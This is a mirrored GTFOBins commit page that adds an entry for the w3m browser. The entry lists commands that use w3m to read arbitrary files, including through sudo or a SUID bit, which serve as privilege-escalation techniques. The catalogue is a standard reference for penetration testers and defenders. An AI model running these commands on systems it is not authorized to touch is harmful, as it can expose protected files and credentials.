1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/w3m.md
pad0van 4ef0f42962
Add w3m
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-16 13:26:40 +01:00

16 lines
259 B
Markdown

---
functions:
file-read:
- code: |
LFILE=file_to_read
w3m "$LFILE" -dump
suid:
- code: |
LFILE=file_to_read
./w3m "$LFILE" -dump
sudo:
- code: |
LFILE=file_to_read
sudo w3m "$LFILE" -dump
---